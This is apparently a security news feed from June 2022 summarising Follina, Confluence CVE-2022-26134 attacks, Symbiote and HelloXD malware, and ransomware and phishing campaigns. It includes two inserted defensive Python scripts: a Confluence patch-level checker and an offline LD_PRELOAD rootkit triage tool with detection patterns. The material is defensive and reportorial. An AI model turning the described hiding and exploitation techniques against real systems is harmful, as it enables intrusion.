                Windows 11 KB5014697 update adds Spotlight for Desktop, fixes 33 bugs

                exploits
                2022-06-14 https://www.bleepingcomputer.com/news/microsoft/windows-11-kb5014697-update-adds-spotlight-for-desktop-fixes-33-bugs/
                Microsoft has released the Windows 11 KB5014697 cumulative update with security updates, improvements, and the new Spotlight for Desktop feature that automatically changes your desktop background. [...]

                Autosummary: Windows 11 KB5014697 cumulative update. Windows 11 users can install today’s update by going to Start > Settings > Windows Update and clicking on "Check for Updates."


                Microsoft patches actively exploited Follina Windows zero-day

                exploits
                2022-06-14 https://www.bleepingcomputer.com/news/security/microsoft-patches-actively-exploited-follina-windows-zero-day/
                Microsoft has released security updates with the June 2022 cumulative Windows Updates to address a critical Windows zero-day vulnerability known as Follina and actively exploited in ongoing attacks. [...]

                Autosummary: Attackers who successfully exploit this zero-day can execute arbitrary code with the privileges of the calling app to install programs, view, change, or delete data, and even create new Windows accounts as allowed by the compromised user’s rights.


                Microsoft June 2022 Patch Tuesday fixes 1 zero-day, 55 flaws

                exploits
                2022-06-14 https://www.bleepingcomputer.com/news/microsoft/microsoft-june-2022-patch-tuesday-fixes-1-zero-day-55-flaws/
                Today is Microsoft’s June 2022 Patch Tuesday, and with it comes fixes for 55 vulnerabilities, including fixes for the Windows MSDT "Follina" zero-day vulnerability and new Intel MMIO flaws. [...]



                Instagram scam steals your selfies to trick your friends

                financial
                2022-06-14 https://blog.malwarebytes.com/personal/scams-personal/2022/06/instagram-scam-steals-your-selfies-to-trick-your-friends/

                Instagram users’ IDs are being stolen in a scam aimed at luring their friends into signing up for expensive subscription services.

                The post Instagram scam steals your selfies to trick your friends appeared first on Malwarebytes Labs.

                Autosummary: A Wix “burner” website using a stolen profile picture. Click on a link (any link at all) and you’d end up at a different domain, at an unbranded “age verification” page hungry for an email, username, and password, so you could “JOIN NOW”. Of course, this wasn’t a “secret account”, there were no “FREE LIVE SHOWS”, and there was no “private content”.


                New Zimbra Email Vulnerability Could Let Attackers Steal Your Login Credentials

                exploits
                2022-06-14 https://thehackernews.com/2022/06/new-zimbra-email-vulnerability-could.html
                A new high-severity vulnerability has been disclosed in the Zimbra email suite that, if successfully exploited, enables an unauthenticated attacker to steal cleartext passwords of users sans any user interaction. "With the consequent access to the victims’ mailboxes, attackers can potentially escalate their access to targeted organizations and gain access to various internal services and steal [...]

                Autosummary: A threat actor, however, can get around these restrictions by exploiting a technique called response smuggling, which entails "smuggling" unauthorized HTTP responses that abuse the CRLF injection flaw to forward IMAP traffic to a rogue server, thereby stealing credentials from users without prior knowledge of their email addresses.


                Android malware on the Google Play Store gets 2 million downloads

                exploits
                2022-06-14 https://www.bleepingcomputer.com/news/security/android-malware-on-the-google-play-store-gets-2-million-downloads/
                Cybersecurity researchers have discovered adware and information-stealing malware on the Google Play Store last month, with at least five still available and having amassed over two million downloads. [...]

                Autosummary: Among the many threats that managed to infiltrate the Google Play Store, the following five are still available: PIP Pic Camera Photo Editor – 1 million downloads, malware masquerading as image-editing software, but which steals the Facebook account credentials of its users.


                Ransomware gang creates site for employees to search for their stolen data

                exploits
                2022-06-14 https://www.bleepingcomputer.com/news/security/ransomware-gang-creates-site-for-employees-to-search-for-their-stolen-data/
                The ALPHV ransomware gang, aka BlackCat, has brought extortion to a new level by creating a dedicated website that allows the customers and employees of their victim to check if their data was stolen in an attack [...]

                Autosummary: While the customer guest data only contains names, arrival date, and stay costs, the employee data includes extremely sensitive information, such as names, Social Security Numbers, date of birth, phone numbers, and email addresses.


                Iranian Hackers Spotted Using a new DNS Hijacking Malware in Recent Attacks

                exploits
                2022-06-13 https://thehackernews.com/2022/06/iranian-hackers-spotted-using-new-dns.html
                The Iranian state-sponsored threat actor tracked under the moniker Lyceum has turned to using a new custom .NET-based backdoor in recent campaigns directed against the Middle East. "The new malware is a .NET based DNS Backdoor which is a customized version of the open source tool 'DIG.net,'" Zscaler ThreatLabz researchers Niraj Shivtarkar and Avinash Kumar said in a report published last week.



                Hello XD Ransomware Installing Backdoor on Targeted Windows and Linux Systems

                exploits ransomware
                2022-06-13 https://thehackernews.com/2022/06/hello-xd-ransomware-installing-backdoor.html
                Windows and Linux systems are being targeted by a ransomware variant called HelloXD, with the infections also involving the deployment of a backdoor to facilitate persistent remote access to infected hosts. "Unlike other ransomware groups, this ransomware family doesn’t have an active leak site; instead it prefers to direct the impacted victim to negotiations through Tox chat and onion-based [...]

                Autosummary: Unit 42 said it linked the likely Russian developer behind HelloXD — who goes by the online aliases x4k, L4ckyguy, unKn0wn, unk0w, _unkn0wn, and x4kme — to further malicious activities such as selling proof-of-concept (PoC) exploits and custom Kali Linux distributions by piecing together the actor’s digital trail.


                Russian hackers start targeting Ukraine with Follina exploits

                exploits
                2022-06-13 https://www.bleepingcomputer.com/news/security/russian-hackers-start-targeting-ukraine-with-follina-exploits/
                Ukraine’s Computer Emergency Response Team (CERT) is warning that the Russian hacking group Sandworm may be exploiting Follina, a remote code execution vulnerability in Microsoft Windows Support Diagnostic Tool (MSDT) currently tracked as CVE-2022-30190. [...]



                Chinese "Gallium" Hackers Using New PingPull Malware in Cyberespionage Attacks

                exploits
                2022-06-13 https://thehackernews.com/2022/06/chinese-gallium-hackers-using-new.html
                A Chinese advanced persistent threat (APT) known as Gallium has been observed using a previously undocumented remote access trojan in its espionage attacks targeting companies operating in Southeast Asia, Europe, and Africa. Called PingPull, the "difficult-to-detect" backdoor is notable for its use of the Internet Control Message Protocol (ICMP) for command-and-control (C2) communications, [...]



                HelloXD Ransomware operators install MicroBackdoor on target systems

                exploits ransomware
                2022-06-13 https://securityaffairs.co/wordpress/132207/malware/helloxd-ransomware-installs-microbackdoor.html

                Experts observed the HelloXD ransomware deploying a backdoor to facilitate persistent remote access to infected hosts. The HelloXD ransomware first appeared in the threat landscape on November 30, 2021; it borrows code from the Babuk ransomware, which has been available on Russian-speaking hacking forums since September 2021. Unlike other ransomware operations, this ransomware gang doesn’t use a […]

                The post HelloXD Ransomware operators install MicroBackdoor on target systems appeared first on Security Affairs.

                Autosummary: The analysis of the MicroBackdoor sample revealed an embedded IP address in the configuration; the IP belongs to a threat actor that is likely the developer: x4k (aka L4ckyguy, unKn0wn, unk0w, _unkn0wn, and x4kme).


                Microsoft: Exchange servers hacked to deploy BlackCat ransomware

                exploits ransomware
                2022-06-13 https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-blackcat-ransomware/
                Microsoft says BlackCat ransomware affiliates are now attacking Microsoft Exchange servers using exploits targeting unpatched vulnerabilities. [...]

                Autosummary: Two weeks after the initial compromise using an unpatched Exchange server as an entry vector, the threat actor deployed BlackCat ransomware payloads across the network via PsExec. "While the common entry vectors for these threat actors include remote desktop applications and compromised credentials, we also saw a threat actor leverage Exchange server vulnerabilities to gain target network access," the Microsoft 365 Defender Threat Intelligence Team said.


                Taking down the IP2Scam tech support campaign

                financial
                2022-06-13 https://blog.malwarebytes.com/threat-intelligence/2022/06/taking-down-the-ip2scam-tech-support-campaign/

                Tech support scams follow a simple business model that has not changed much over the years. After all, why change a recipe that continues to yield large profits? We see countless such campaigns and block them indiscriminately to protect our customers from being defrauded by a fraudulent tech support agent over the phone. Every now...

                The post Taking down the IP2Scam tech support campaign appeared first on Malwarebytes Labs.

                Autosummary: Indicators of Compromise: cloaking domains; browlock IPs by ASN and timestamp (DigitalOcean, Choopa). Malvertising flow: as with many other malvertising campaigns, the scammers prey on visitors to adult websites and perform a very simple cloaking technique to hijack traffic and redirect it to their browser locker.


                Russia-linked APT targets Ukraine by exploiting the Follina RCE vulnerability

                exploits
                2022-06-13 https://securityaffairs.co/wordpress/132227/apt/cert-ua-sandworm-follina-rce.html

                Ukraine’s Computer Emergency Response Team (CERT) warns that the Russia-linked Sandworm APT group may be exploiting the recently discovered Follina RCE vulnerability. The issue, tracked as CVE-2022-30190, impacts the Microsoft Windows Support Diagnostic Tool (MSDT). Nation-state actors […]

                The post Russia-linked APT targets Ukraine by exploiting the Follina RCE vulnerability appeared first on Security Affairs.

                "

                Autosummary: "


                Gallium hackers backdoor finance, govt orgs using new PingPull malware

                financial exploits
                2022-06-13 https://www.bleepingcomputer.com/news/security/gallium-hackers-backdoor-finance-govt-orgs-using-new-pingpull-malware/
                The Gallium state-sponsored hacking group has been spotted using a new "PingPull" remote access trojan against financial institutions and government entities in Europe, Southeast Asia, and Africa. [...] "

                Autosummary: "


                Kaiser Permanente data breach exposes health data of 69K people

                financial
                2022-06-13 https://www.bleepingcomputer.com/news/security/kaiser-permanente-data-breach-exposes-health-data-of-69k-people/
                Kaiser Permanente, one of America’s leading not-for-profit health plans and health care providers, has recently disclosed a data breach that exposed the health information of more than 69,000 individuals. [...] "

                Autosummary: "


                Week in review: Follina exploit delivers Qbot malware, Patch Tuesday forecast, RSAC 2022

                exploits
                2022-06-12 https://www.helpnetsecurity.com/2022/06/12/week-in-review-follina-exploit-delivers-qbot-malware-patch-tuesday-forecast-rsac-2022/

                Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: RSA Conference 2022 coverage Check out our microsite for related news, photos, product releases, and more. Researchers unearth highly evasive “parasitic” Linux malware Security researchers at Intezer and BlackBerry have documented Symbiote, a wholly unique, multi-purpose piece of Linux malware that is nearly impossible to detect. Apple unveils passkeys for passwordless authentication to apps and websites At WWDC 2022, Apple … More

                The post Week in review: Follina exploit delivers Qbot malware, Patch Tuesday forecast, RSAC 2022 appeared first on Help Net Security.

                "

                Autosummary: New infosec products of the week: June 10, 2022 Here’s a look at the most interesting products from the past week, featuring releases from Acronis, Code42, Cynet, Elastic, Living Security, Lumu, NetWitness, Qualys, SafeBreach, and Swimlane. Apple unveils passkeys for passwordless authentication to apps and websites At WWDC 2022, Apple has announced and previewed iOS 16 and iPad OS 16, macOS 13 (aka macOS Ventura), watchOS 9, their new M2 chips, new MacBook Air and Pro, as well as new tools, technologies, and APIs for developers focusing on Apple’s platforms. "


                Ransomware gangs are exploiting CVE-2022-26134 RCE in Atlassian Confluence servers

                exploits
                2022-06-12 https://securityaffairs.co/wordpress/132186/cyber-crime/ransomware-gangs-cve-2022-26134-rce-atlassian-confluence.html

                Multiple ransomware groups are actively exploiting the recently disclosed remote code execution (RCE) vulnerability tracked as CVE-2022-26134, which affects Atlassian Confluence Server and Data Center. Proof-of-concept exploits for the CVE-2022-26134 vulnerability have been released online; Bleeping Computer reported that starting from […]

                The post Ransomware gangs are exploiting CVE-2022-26134 RCE in Atlassian Confluence servers appeared first on Security Affairs.

                "

                Autosummary: Proof-of-concept exploits for the CVE-2022-26134 vulnerability have been released online, Bleeping Computer reported that starting from Friday afternoon, a proof-of-concept exploit for this issue was publicly shared. "


                Hello XD ransomware now drops a backdoor while encrypting

                exploits ransomware
                2022-06-12 https://www.bleepingcomputer.com/news/security/hello-xd-ransomware-now-drops-a-backdoor-while-encrypting/
                Cybersecurity researchers report increased activity of the Hello XD ransomware, whose operators are now deploying an upgraded sample featuring stronger encryption. [...] "

                Autosummary: Samples of X4KME online presence (Unit 42) Additionally, the same hacker has posted on forums to offer proof-of-concept (PoC) exploits, crypter services, custom Kali Linux distributions, and malware-hosting and distribution services. "


                Confluence servers hacked to deploy AvosLocker, Cerber2021 ransomware

                exploits ransomware
                2022-06-11 https://www.bleepingcomputer.com/news/security/confluence-servers-hacked-to-deploy-avoslocker-cerber2021-ransomware/
                Ransomware gangs are now targeting a recently patched and actively exploited remote code execution (RCE) vulnerability affecting Atlassian Confluence Server and Data Center instances for initial access to corporate networks. [...] "

                Autosummary: Widely exploited in the wild Since cybersecurity firm Volexity disclosed CVE-2022-26134 as an actively exploited zero-day bug last week, CISA has also ordered federal agencies to mitigate the flaw by blocking all internet traffic to Confluence servers on their networks. "


                DogWalk zero-day Windows bug receives patch – but not from Microsoft

                exploits
                2022-06-10 https://www.bitdefender.com/blog/hotforsecurity/dogwalk-zero-day-windows-bug-receives-patch-but-not-from-microsoft/
                A Windows zero-day vulnerability dubbed "DogWalk" has not received an official patch yet from Microsoft, but that hasn’t stopped others from offering free fixes to protect users. Read more in my article on the Hot for Security blog. "

                Autosummary: At the time Microsoft said that it would not be fixing the bug as it did not view it as satisfying its vulnerability criteria, and "DogWalk" remained largely forgotten until last week when another flaw in MSDT that was being exploited in the wild - "Follina" - made the headlines of IT media outlets. "


                Researchers unearth highly evasive “parasitic” Linux malware

                exploits
                2022-06-10 https://www.helpnetsecurity.com/2022/06/10/symbiote-linux-malware/

                Security researchers at Intezer and BlackBerry have documented Symbiote, a wholly unique, multi-purpose piece of Linux malware that is nearly impossible to detect. “What makes Symbiote different from other Linux malware that we usually come across, is that it needs to infect other running processes to inflict damage on infected machines. Instead of being a standalone executable file that is run to infect a machine, it is a shared object (SO) library that is loaded … More

                The post Researchers unearth highly evasive “parasitic” Linux malware appeared first on Help Net Security.

                "

                Autosummary: "


                Vice Society ransomware gang adds the Italian City of Palermo to its data leak site

                exploits government ransomware
                2022-06-10 https://securityaffairs.co/wordpress/132122/cyber-crime/city-of-palermo-vice-society-ransomware.html

                The Vice Society ransomware group has claimed responsibility for the recent cyber attack that hit the city of Palermo, in the south of Italy, forcing its IT admins to shut down the municipal infrastructure. In response to the […]

                The post Vice Society ransomware gang adds the Italian City of Palermo to its data leak site appeared first on Security Affairs.

                "

                Autosummary: Sispi (Palermo Innovazione System), the municipal company responsible for the technical management of the IT and telematic systems of the Municipality of Palermo, confirmed the ransomware attack a few days later, but at this time it has not confirmed a data breach. "


                Experts spotted a new variant of the Cuba Ransomware with optimized infection techniques

                exploits ransomware
                2022-06-10 https://securityaffairs.co/wordpress/132134/malware/cuba-ransomware-new-variant.html

                The Cuba ransomware operators are back and have employed a new version of their malware in recent attacks. Cuba ransomware has been active since at least January 2020. Its operators run a data leak site, where they post data exfiltrated from victims who refused to pay the ransom. The ransomware encrypts files on the targeted systems […]

                The post Experts spotted a new variant of the Cuba Ransomware with optimized infection techniques appeared first on Security Affairs.

                "

                Autosummary: "


                Hackers exploit recently patched Confluence bug for cryptomining

                exploits
                2022-06-10 https://www.bleepingcomputer.com/news/security/hackers-exploit-recently-patched-confluence-bug-for-cryptomining/
                A cryptomining hacking group has been observed exploiting the recently disclosed remote code execution flaw in Atlassian Confluence servers to install miners on vulnerable servers. [...] "

                Autosummary: Atlassian has warned its customers that the only mitigation for the critical flaw is to apply the security updates, which have become available in versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, and 7.18.1. "
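The only mitigation Atlassian offered for CVE-2022-26134 was upgrading to one of the fixed releases listed above, so the practical check is "does my build carry the fix on its branch?". The following is an added example, not Atlassian's tooling or code from the article: it encodes the fixed-version list from the page and classifies a reported Confluence version. It assumes (hypothetically, for this example) that any feature branch newer than 7.18 shipped after the fix, and that the version can be read from the `ajs-version-number` meta tag Confluence pages carry; the sample HTML is constructed, not a real capture.

```python
"""Classify a Confluence Server/Data Center version against the
CVE-2022-26134 fixed releases. Added example; not Atlassian's code."""
import re

# Fixed releases exactly as listed in the advisory quoted on the page.
FIXED_VERSIONS = ["7.4.17", "7.13.7", "7.14.3", "7.15.2", "7.16.4", "7.17.4", "7.18.1"]


def parse_version(text):
    """'7.13.6' -> (7, 13, 6). Trailing suffixes such as '-beta1' are ignored."""
    m = re.match(r"^\s*(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(x) for x in m.groups())


# Map each feature branch (major, minor) to the first fixed build on it.
_FIXED_BY_BRANCH = {parse_version(v)[:2]: parse_version(v) for v in FIXED_VERSIONS}
_NEWEST_FIXED_BRANCH = max(_FIXED_BY_BRANCH)  # (7, 18)


def is_patched(version):
    """Return (patched, reason) for a Confluence version string."""
    ver = parse_version(version)
    branch = ver[:2]
    if branch in _FIXED_BY_BRANCH:
        fixed = _FIXED_BY_BRANCH[branch]
        fixed_str = ".".join(map(str, fixed))
        if ver >= fixed:
            return True, f"{version} is at or above fixed release {fixed_str}"
        return False, f"{version} is below fixed release {fixed_str} on its branch"
    if branch > _NEWEST_FIXED_BRANCH:
        # Assumption for this example: branches newer than 7.18 were cut after the fix.
        return True, f"{version} is on a branch newer than the newest fixed branch"
    # Branches with no fixed build on the list (e.g. 7.5.x to 7.12.x, or older
    # than 7.4) must be upgraded to one of the fixed releases.
    return False, f"no fixed release exists on the {branch[0]}.{branch[1]} branch; upgrade"


def version_from_html(html):
    """Pull the build number from a Confluence page.
    Assumption: the page contains <meta name="ajs-version-number" content="...">."""
    m = re.search(r'<meta\s+name="ajs-version-number"\s+content="([^"]+)"', html)
    return m.group(1) if m else None


# Constructed login-page fragment for the demonstration (not a real capture).
SAMPLE_HTML = '<html><head><meta name="ajs-version-number" content="7.13.6"></head></html>'

if __name__ == "__main__":
    found = version_from_html(SAMPLE_HTML)
    print(found, is_patched(found))
```

Versions on branches without a listed fix (7.5 through 7.12) are reported as vulnerable even when fully up to date on that branch, which is the case that catches out teams who only look at "latest patch level".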


                Threat actors exploit recently disclosed Atlassian Confluence flaw in cryptomining campaign

                exploits
                2022-06-10 https://securityaffairs.co/wordpress/132140/cyber-crime/cryptomining-campaign-atlassian-confluence-flaw.html

                CheckPoint researchers have observed threat actors exploiting the recently disclosed CVE-2022-26134 remote code execution vulnerability in Atlassian Confluence servers to deploy cryptocurrency miners. Last week, Atlassian warned of a critical unpatched remote code execution vulnerability affecting all Confluence […]

                The post Threat actors exploit recently disclosed Atlassian Confluence flaw in cryptomining campaign appeared first on Security Affairs.

                "

                Autosummary: "


                The Week in Ransomware - June 10th 2022 - Targeting Linux

                exploits ransomware
                2022-06-10 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-10th-2022-targeting-linux/
                It has been relatively quiet this week with many companies and researchers at the RSA conference. However, we still had some interesting ransomware reports released this week. [...] "

                Autosummary: Contributors and those who provided new ransomware information and stories this week include: @billtoulas, @VK_Intel, @demonslay335, @DanielGallagher, @Ionut_Ilascu, @LawrenceAbrams, @fwosar, @malwrhunterteam, @jorntvdw, @malwareforme, @FourOctets, @serghei, @PolarToffee, @Seifreed, @struppigel, @BleepinComputer, @TrendMicro, @uptycs, @NCCGroupInfosec, @Intel_by_KELA, @y_advintel, @Avast, @BrettCallow, @ValeryMarchive, and @pcrisk. "


                Facebook users targeted in massive phishing campaign

                financial
                2022-06-09 https://blog.malwarebytes.com/scams/2022/06/facebook-users-targeted-in-massive-phishing-campaign/

                We take a look at a large-scale Facebook phishing operation, reputedly generating millions in ill-gotten gains.

                The post Facebook users targeted in massive phishing campaign appeared first on Malwarebytes Labs.

                "

                Autosummary: The campaign, which first shows signs of life back in September 2021, has generated millions of page views and ad referral revenue “estimated to be millions of USD at this scale of operation”. What is clear is that without dedicated resources and probable law enforcement involvement, something like this will never fully go away. "


                BlackBasta is the latest ransomware to target ESXi virtual machines on Linux

                exploits ransomware
                2022-06-09 https://blog.malwarebytes.com/ransomware/2022/06/blackbasta-is-the-latest-ransomware-to-target-esxi-virtual-machines-on-linux/

                BlackBasta, a newish ransomware group that is somehow linked to Conti, has a new Linux variant of its malware that targets VMware ESXi virtual machines.

                The post BlackBasta is the latest ransomware to target ESXi virtual machines on Linux appeared first on Malwarebytes Labs.

                "

                Autosummary: (Source: Uptycs) A section of the ransom note reads: “Your data are stolen and encrypted. The data will be published on TOR website if you do not pay the ransom. You can contact us and decrypt one file for free on this TOR site (you should download and install TOR browser first https://torproject.org) {URL redacted}”. Protect your Linux ESXi VM against ransomware attacks: Vincent Bariteau, Threat Intelligence Support Analyst at Malwarebytes, recommends organizations follow these best practices to protect their Linux servers against ransomware attacks if they’re using ESXi VM: harden the SSH (Secure Shell) access to allow only a specific user to use it. "


                Vice Society ransomware claims attack on Italian city of Palermo

                exploits government ransomware
                2022-06-09 https://www.bleepingcomputer.com/news/security/vice-society-ransomware-claims-attack-on-italian-city-of-palermo/
                The Vice Society ransomware group has claimed responsibility for the recent cyber attack on the city of Palermo in Italy, which has caused a large-scale service outage. [...] "

                Autosummary: "


                New Symbiote malware infects all running processes on Linux systems

                exploits
                2022-06-09 https://www.bleepingcomputer.com/news/security/new-symbiote-malware-infects-all-running-processes-on-linux-systems/
                Threat analysts have discovered a new malware targeting Linux systems that operates as a symbiote in the host, blending perfectly with running processes and network traffic to steal account credentials and give its operators backdoor access. [...] "

                Autosummary: (Figure: spawning a root shell on the host; source BlackBerry.) The malware’s targets are mostly entities in the financial sector in Latin America, impersonating Brazilian banks, the country’s Federal Police, etc. "Since the malware operates as a user-land level rootkit, detecting an infection may be difficult," the researchers concluded. "


                Microsoft disrupts Bohrium spear-phishing ring by seizing 41 domains

                financial
                2022-06-09 https://www.bitdefender.com/blog/hotforsecurity/microsoft-disrupts-bohrium-spear-phishing-ring-by-seizing-41-domains/
                An Iranian hacking gang called Bohrium has had its activities disrupted after Microsoft seized control of 41 domains used in spear-phishing attacks. Read more in my article on the Hot for Security blog. "

                Autosummary: "


                The most common exploit paths enterprises leave open for attackers

                exploits
                2022-06-09 https://www.helpnetsecurity.com/2022/06/09/exploit-paths-enterprises/

                Exposed version control repositories, leaked secrets in public code repositories, a subdomain vulnerable to takeover, exposed Amazon S3 buckets, and Microsoft Exchange servers vulnerable to CVE-2021-42321 exploitation are the most common exploit paths medium to large enterprises left open for attackers in Q1 2022, according to Mandiant. Opening doors for attackers The firm has based the list on the most common issues discovered by continuously scanning the external attack surface of its customers from … More

                The post The most common exploit paths enterprises leave open for attackers appeared first on Help Net Security.

                "

                Autosummary: "


                Ransomware attacks have increased by 80% year-over-year

                exploits
                2022-06-09 https://www.helpnetsecurity.com/2022/06/09/most-prevalent-ransomware-trends-video/

                In 2022, the most prevalent ransomware trends include double extortion, supply chain attacks, ransomware-as-a-service, ransomware rebranding, and geopolitically incited ransomware attacks. “Modern ransomware attacks require a single successful asset compromise to gain initial entry, move laterally, and breach the entire environment, making legacy VPN and flat networks extremely vulnerable,” said Deepen Desai, CISO of Zscaler. “Attackers are finding success exploiting weaknesses across businesses’ supply chains as well as critical vulnerabilities like Log4Shell, PrintNightmare, and others. And … More

                The post Ransomware attacks have increased by 80% year-over-year appeared first on Help Net Security.

                "

                Autosummary: "


                Malwarebytes DNS Filtering helps IT and security teams block access to malicious websites

                exploits
                2022-06-09 https://www.helpnetsecurity.com/2022/06/09/malwarebytes-dns-filtering/

                At RSA Conference 2022, Malwarebytes announced the expansion of its Nebula platform with a new DNS Filtering module available for Windows on June 14 and for Mac in July. Malwarebytes DNS Filtering is powered by Cloudflare‘s zero trust platform to deliver a flexible and comprehensive zero trust solution for Nebula users. Malwarebytes DNS Filtering module for Nebula helps block access to malicious websites and limit threats introduced by suspicious content. “It’s challenging for organizations today … More

                The post Malwarebytes DNS Filtering helps IT and security teams block access to malicious websites appeared first on Help Net Security.

                "

                Autosummary: Now, IT and security teams can block whole categories of sites, take advantage of an extensive database of pre-defined scores on known, suspicious web domains, protect core web-based applications and manage specific site restrictions, removing the headache from overseeing site access.” "


                Symbiote: A Stealthy Linux Malware Targeting Latin American Financial Sector

                financial exploits
                2022-06-09 https://thehackernews.com/2022/06/symbiote-stealthy-linux-malware.html
                Cybersecurity researchers have taken the wraps off what they call a "nearly-impossible-to-detect" Linux malware that could be weaponized to backdoor infected systems. Dubbed Symbiote by threat intelligence firms BlackBerry and Intezer, the stealthy malware is so named for its ability to conceal itself within running processes and network traffic and drain a victim’s resources like a parasite. "

                Autosummary: "


                Cloud data breaches: 4 biggest threats to cloud storage security

                financial
                2022-06-09 https://blog.malwarebytes.com/business/2022/06/cloud-data-breaches-4-biggest-threats-to-cloud-storage-security/

                Here are four big threats to cloud storage security that SMBs should be ready to address to help prevent cloud data breaches.

                The post Cloud data breaches: 4 biggest threats to cloud storage security appeared first on Malwarebytes Labs.

                "

                Autosummary: Weak IAM policies Each user in a cloud environment has their own roles and permissions governing the access they get to certain parts of the cloud, and because cloud workloads are accessed online, all hackers need are your credentials to get the “keys to the kingdom”. Small and medium businesses (SMBs) are also reaping the many benefits that the cloud offers over on-premise software, especially the lowered IT costs, increased scalability, and large storage capacity that come along with it. "


                Bizarre ransomware sells decryptor on Roblox Game Pass store

                exploits ransomware
                2022-06-09 https://www.bleepingcomputer.com/news/security/bizarre-ransomware-sells-decryptor-on-roblox-game-pass-store/
                A new ransomware is taking the unusual approach of selling its decryptor on the Roblox gaming platform using the service’s in-game Robux currency. [...] "

                Autosummary: (Figure: files encrypted by the Chaos ransomware variant; source BleepingComputer.) What makes the new WannaFriendMe ransomware stand out is that instead of demanding cryptocurrency as a ransom payment, it requires victims to purchase a decryptor from Roblox’s Game Pass store using Robux, as can be read in the ransom note. "


                Symbiote, a nearly-impossible-to-detect Linux malware

                exploits
                2022-06-09 https://securityaffairs.co/wordpress/132113/malware/symbiote-linux-malware.html

                Researchers uncovered a highly stealthy Linux malware, dubbed Symbiote, that could be used to backdoor infected systems. Joint research conducted by security firms Intezer and BlackBerry uncovered the new Linux threat. The name comes from the concept of a symbiote, an organism that lives in symbiosis with another organism, exactly as this implant does with […]

                The post Symbiote, a nearly-impossible-to-detect Linux malware appeared first on Security Affairs.

                "

                Autosummary: “Once the malware has infected a machine, it hides itself and any other malware used by the threat actor, making infections very hard to detect.” “Network telemetry can be used to detect anomalous DNS requests, and security tools such as antivirus and endpoint detection and response (EDR) should be statically linked to ensure they are not ‘infected’ by userland rootkits.” "
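The researchers' advice that detection tooling be statically linked follows from how Symbiote loads: a shared object listed in /etc/ld.so.preload is injected into every dynamically linked process, where it can hook the libc calls those processes use to read files and list directories, and so hide itself. The practical consequence is that a check run on the live host by a dynamically linked program (Python included) can be lied to. The added example below, which is not code from Intezer, BlackBerry, or the article, sidesteps that by triaging an offline copy of the root filesystem (a mounted disk image or a snapshot): it lists the preload entries, flags libraries that live in volatile or world-writable directories or are missing from the image, and finds shell configuration that exports LD_PRELOAD. The mock filesystem it builds is constructed for the demonstration; the directory list and file names are assumptions, not indicators from the report.

```python
"""Offline triage for LD_PRELOAD-style userland rootkits.
Run against a mounted image root, not the live (possibly hooked) host.
Added example; not code from the Symbiote research."""
import os
import re
import tempfile

# Directories where a legitimate preload library would not normally live (assumption).
SUSPECT_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/run/")


def check_ld_so_preload(root):
    """Inspect <root>/etc/ld.so.preload; return a list of (library, finding)."""
    findings = []
    path = os.path.join(root, "etc", "ld.so.preload")
    if not os.path.exists(path):
        return findings
    with open(path, "r", errors="replace") as fh:
        for line in fh:
            lib = line.strip()
            if not lib or lib.startswith("#"):
                continue
            on_image = os.path.join(root, lib.lstrip("/"))
            if any(lib.startswith(d) for d in SUSPECT_DIRS):
                findings.append((lib, "preload library in a volatile or world-writable directory"))
            elif not os.path.exists(on_image):
                findings.append((lib, "preload library missing from the image"))
            else:
                findings.append((lib, "preload entry present; review the library"))
    return findings


# Matches "LD_PRELOAD=..." or "export LD_PRELOAD=..." at the start of a line.
LD_PRELOAD_RE = re.compile(r"^\s*(?:export\s+)?LD_PRELOAD\s*=", re.MULTILINE)


def find_ld_preload_in_configs(root):
    """Return image-relative paths of shell/env config files that set LD_PRELOAD."""
    candidates = [
        os.path.join(root, "etc", "environment"),
        os.path.join(root, "etc", "profile"),
        os.path.join(root, "etc", "bash.bashrc"),
    ]
    profile_d = os.path.join(root, "etc", "profile.d")
    if os.path.isdir(profile_d):
        candidates += [os.path.join(profile_d, f) for f in sorted(os.listdir(profile_d))]
    hits = []
    for p in candidates:
        if os.path.isfile(p):
            with open(p, "r", errors="replace") as fh:
                if LD_PRELOAD_RE.search(fh.read()):
                    hits.append(os.path.relpath(p, root))
    return hits


def build_sample_image():
    """Construct a mock mounted root filesystem (not real forensic data)."""
    root = tempfile.mkdtemp(prefix="triage-")
    os.makedirs(os.path.join(root, "etc", "profile.d"))
    os.makedirs(os.path.join(root, "usr", "lib"))
    with open(os.path.join(root, "etc", "ld.so.preload"), "w") as fh:
        fh.write("/usr/lib/libpayload.so\n/tmp/.x/libhide.so\n")
    open(os.path.join(root, "usr", "lib", "libpayload.so"), "wb").close()
    with open(os.path.join(root, "etc", "profile.d", "zz-env.sh"), "w") as fh:
        fh.write("export LD_PRELOAD=/usr/lib/libpayload.so\n")
    return root


if __name__ == "__main__":
    image = build_sample_image()
    for lib, why in check_ld_so_preload(image):
        print(f"{lib}: {why}")
    print("LD_PRELOAD set in:", find_ld_preload_in_configs(image))
```

A preload entry that points at an existing, package-owned library is not proof of compromise on its own, which is why the third finding only asks for review; the two stronger signals are an entry under a volatile directory and an entry whose file the image no longer contains.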


                Ping Identity, Yubico, and EntryPoint bring zero trust to FIDO2 authenticators for the US Federal Government

                government
                2022-06-09 https://www.helpnetsecurity.com/2022/06/10/ping-identity-yubico-entrypoint/

                Ping Identity, Yubico, and EntryPoint partnered on a joint solution that enables phishing-resistant Derived FIDO2 Credentials (DFCs) along with identity proofing and centralized identity management. “Phishing-resistant MFA is an immediate priority for enterprises and is now a specific requirement for the U.S. government,” said Andre Durand, CEO and founder of Ping Identity. “By incorporating enterprise-grade federation and access controls into this joint solution, organizations can easily use Derived FIDO2 Credentials to enhance the security of … More

                The post Ping Identity, Yubico, and EntryPoint bring zero trust to FIDO2 authenticators for the US Federal Government appeared first on Help Net Security.

                "

                Autosummary: "


                Roblox Game Pass store used to sell ransomware decryptor

                exploits ransomware
                2022-06-09 https://www.bleepingcomputer.com/news/security/roblox-game-pass-store-used-to-sell-ransomware-decryptor/
                A new ransomware is taking the unusual approach of selling its decryptor on the Roblox gaming platform using the service’s in-game Robux currency. [...] "

